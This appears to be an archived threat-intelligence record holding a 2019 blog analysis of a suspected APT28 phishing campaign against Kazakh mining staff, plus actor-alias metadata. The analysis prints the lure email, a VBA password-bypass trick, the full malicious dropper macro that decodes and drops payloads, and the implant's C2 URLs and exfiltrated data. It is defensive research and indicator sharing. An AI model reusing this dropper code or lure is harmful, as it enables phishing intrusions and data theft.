{ "id": "64c5b718-b931-4b1e-933f-640265a2c05e", "created_at": "2026-04-06T00:12:03.580264Z", "updated_at": "2026-04-10T13:11:28.466348Z", "deleted_at": null, "sha1_hash": "c4fc00e74093b4213cd2ae36aa45a0178eb5e462", "title": "10/24/2019 - APT28: Targeted attacks against mining corporations in Kazakhstan", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2270638, "plain_text": "10/24/2019 - APT28: Targeted attacks against mining corporations\r\nin Kazakhstan\r\nBy MELTX0R\r\nPublished: 2019-10-24 · Archived: 2026-04-02 11:31:43 UTC\r\nSummary\r\nAPT28 (also commonly known as FancyBear, STRONTIUM, Sednit, Sofacy, and more) is a threat group that has\r\nbeen attributed to Russia’s Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S.\r\nDepartment of Justice indictment. The group has been regarded as being active since at least 2004, and is\r\nespionage motivated. It’s targets have included the private sector, military, and governments across the world. In\r\nthis post, I will review a campaign that I believe to have been conducted by APT28.\r\nAnalysis\r\nWhile performing research, I came across an interesting document titled “gorodpavlodar.doc”. This document\r\nwas an attachment within an equally as interesting email - this email was sent to multiple individuals who, as far\r\nas my research indicates, work for a large mining corporation with operations located in Kazakhstan. The email\r\npurports to be sent from the “OFFICIAL RESOURCE OF THE CITY OF PAVLODAR”, but is actually sent by\r\nthe address “pavlodar.news@bk.ru”. Pavlodar is a city in northeastern Kazakhstan and the capital of the Pavlodar\r\nRegion. The original email and translation are listed below, which prompts the recipient of the email to review the\r\nattached document.\r\nORIGINAL (RUSSIAN):\r\nFrom: ОФИЦИАЛЬНЫЙ РЕСУРС ГОРОДА ПАВЛОДАР [pavlodar.news@bk.ru]\r\nSubject: ГРАФИК ПОДКЛЮЧЕНИЯ ВАШЕГО ЖИЛОГО ДОМА К ГОРЯЧЕМУ ВОДОСНАБЖЕНИЮ\r\nНа сегодняшний день без горячего водоснабжения остаются 240 многоэтажных жилых домов,\r\nпередаёт корреспондент pavlodarnews.kz.\r\nС 13 по 19 мая ТОО «Павлодарские тепловые сети» проводило гидравлические испытания на\r\nинженерных сетях теплоснабжения в северной части города. Было выявлено 84 повреждения,\r\nhttps://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nPage 1 of 7\n\nсвязи с чем на сегодняшний день без ГВС остаются 240 многоэтажных жилых домов.\r\nС графиком подключения жилых домов к горячему водоснабжению вы можете ознакомится во\r\nвложении, прикрепленному к письму.\r\n________________________________\r\nОФИЦИАЛЬНЫЙ ИНТЕРНЕТ-РЕСУРС АКИМАТА ГОРОДА ПАВЛОДАР\r\nTRANSLATION:\r\nFrom: OFFICIAL RESOURCE OF PAVLODAR CITY [pavlodar.news@bk.ru]\r\nSubject: SCHEDULE OF CONNECTING YOUR RESIDENTIAL HOUSE TO HOT WATER SUPPLY\r\nTo date, 240 multi-storey residential buildings remain without hot water,\r\nreports correspondent pavlodarnews.kz.\r\nFrom May 13 to 19, Pavlodar Heating Networks LLP conducted hydraulic tests on\r\nheat supply engineering networks in the northern part of the city. 84 injuries were identified, in\r\nIn connection with this, 240 multi-storey residential buildings remain without hot water supply.\r\nYou can familiarize yourself with the schedule for connecting residential buildings to hot water i\r\nattachment attached to the letter.\r\n________________________________\r\nOFFICIAL INTERNET RESOURCE OF AKIMAT CITY PAVLODAR\r\nThe attached document also contained text written in Russian, which translated roughly to “Schedule of\r\nconnecting your residential house to hot water supply” and purported to be from the “Official Internet Resource\r\nof Akimat City Pavlodar”. The document appeared to be a form for the recipients to fill out with their address,\r\ndate of water elimination, and reason for lack of hot water. It also prompts the recipient to enable Editing/Content\r\nto view the “protected” document.\r\nhttps://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nPage 2 of 7\n\nShown above: Suspected APT28 Lure “gorodpavlodar.doc”\r\nOpening the Visual Basic console via the developer tab in Word reveals a password protected project that would\r\nbe run if content were enabled. To bypass this password restriction, I opened the document within a Hex editor\r\nand searched for the string “DPB=” which contains the VBA password, and changed it to “DPx=”. Opening the\r\nproject following this causes Word to throw multiple errors regarding the invalid key (DPx), but allows me to\r\nbypass the password restriction. This allows me to view the contents of the project, displayed below, which looks\r\nto be a UserForm containing quite a lot of data in two of the input boxes, in addition to some labels.\r\nhttps://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nPage 3 of 7\n\nShown above: Suspected APT28 Lure VBA Project\r\nIf I extract the embedded macro, I can see that it essentially does two things - create two files (graphic.doc and\r\nlibssl.exe) from the code embedded within the VBA project, and drops those files in the “C:\\Users\\\r\n[username]\\AppData\\Roaming\" directory.\r\nPrivate Sub Document_Open()\r\nOn Error Resume Next\r\nDim ds As String: ds = Environ(\"APPDATA\") \u0026 \"\\graphic.doc\"\r\nDim dd As String: dd = Environ(\"APPDATA\") \u0026 tyihkcjfghkvb.dvxdcxxv.Caption \u0026 tyihkcjfghkvb.Label1\r\nvbnbnm dd, drgvfdhre(tyihkcjfghkvb.dxvgfchftbxfh.Value)\r\nvbnbnm ds, drgvfdhre(tyihkcjfghkvb.Text.Value)\r\nSet qw = CreateObject(\"Word.Application\")\r\nqw.Visible = True\r\nSet ww = qw.Documents.Open(ds)\r\nApplication.Quit SaveChanges:=wdDoNotSaveChanges\r\nEnd Sub\r\nPrivate Function drgvfdhre(tyruyt)\r\n Dim fghfhggjj, asddf\r\n Set fghfhggjj = CreateObject(\"Microsoft.XMLDOM\")\r\n Set asddf = fghfhggjj.createElement(\"tmp\")\r\n asddf.dataType = \"bin.base64\"\r\n asddf.Text = tyruyt\r\n drgvfdhre = asddf.nodeTypedValue\r\nEnd Function\r\nPrivate Sub vbnbnm(tgbyh, edcrf)\r\n Dim qsxx\r\n Set qsxx = CreateObject(\"ADODB.Stream\")\r\n qsxx.Type = 1\r\n qsxx.Open\r\nhttps://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nPage 4 of 7\n\nqsxx.Write edcrf\r\n qsxx.SaveToFile tgbyh, 2\r\nEnd Sub\r\nShown above: Macro within gorodpavlodar.doc\r\nFollowing execution of the macro, the original document is deleted and the secondary document “graphic.doc” is\r\nopened. This document appears to be a “completed” version of the form contained within the original document,\r\nand also contains an embedded macro that executes the aforementioned executable “libssl.exe”.\r\nShown above: graphic.doc\r\nFollowing execution of “libssl.exe”, it will modify the registry to maintain persistence\r\n(HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run). It will then initiate Command \u0026\r\nControl communications to two hard-coded URL’s via HTTP POST requests -\r\nwww.gorodpavlodar.kz/modules/Contact/Includes/1c.php and\r\nwww.gorodpavlodar.kz/modules/Contact/Includes/2c.php, along with a hard-coded User-Agent string “Mozilla/5.0\r\n(Windows NT 10.0; Win64; x64)”. The information POST’d includes URL encoded host information - such as a\r\nunique ID, drive information, hostname, OS, username, bios, date, process listing, and more. In the past, these\r\nPOST requests would receive binary data in the server responses, but they are now being met with 404 HTTP\r\nresponses.\r\nhttps://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nPage 5 of 7\n\nShown above: Suspected Zebrocy Implant C2 network capture\r\nWhile I will leave the in-depth malware analysis to those more adept, the observed activity related to the binary up\r\nto this point is very reminiscent of APT28’s “Zebrocy” implant. Furthermore, static analysis of the binary reveals\r\nnumerous similarities to other documented Zebrocy samples - particularly the one documented here by Vitali\r\nKremez. While this isn’t conclusive evidence that APT28 is responsible for this sample, the similarities between it\r\nand other confirmed Zebrocy implants, in addition to the fact that Kazakhstan has historically been targeted by\r\nAPT28, is quite suspect. Regardless, it was an interesting sample to review and gives insight into potential\r\neconomic espionage activities.\r\nIndicators\r\nIndicator Type Description\r\n27e9247d28598207794424eeb5ea4b1b MD5 libssl.exe - Suspected Zebrocy Implant\r\na863c2944581bc734619bf8d6ab1aef8 MD5\r\ngorodpavlodar.doc - Suspected Zebrocy dropper\r\ndocument\r\n57c2b46c7f2ad9aba80e4b6248f9367a MD5 graphic.doc\r\n/modules/Contact/Includes/1c.php URI Suspected Zebrocy Implant C2 URI Pattern\r\n/modules/Contact/Includes/2c.php URI Suspected Zebrocy Implant C2 URI Pattern\r\npavlodar.news@bk.ru\r\nEmail\r\nAddress\r\nEmail Address used in suspected APT28\r\ncampaign\r\nReferences/Further Reading\r\n1. https://www.vkremez.com/2019/01/lets-learn-overanalyzing-one-of-latest.html\r\n2. https://attack.mitre.org/groups/G0007/\r\nhttps://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nPage 6 of 7\n\nSource: https://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nhttps://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://meltx0r.github.io/tech/2019/10/24/apt28.html" ], "report_names": [ "apt28.html" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434323, "ts_updated_at": 1775826688, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c4fc00e74093b4213cd2ae36aa45a0178eb5e462.pdf", "text": "https://archive.orkl.eu/c4fc00e74093b4213cd2ae36aa45a0178eb5e462.txt", "img": "https://archive.orkl.eu/c4fc00e74093b4213cd2ae36aa45a0178eb5e462.jpg" } }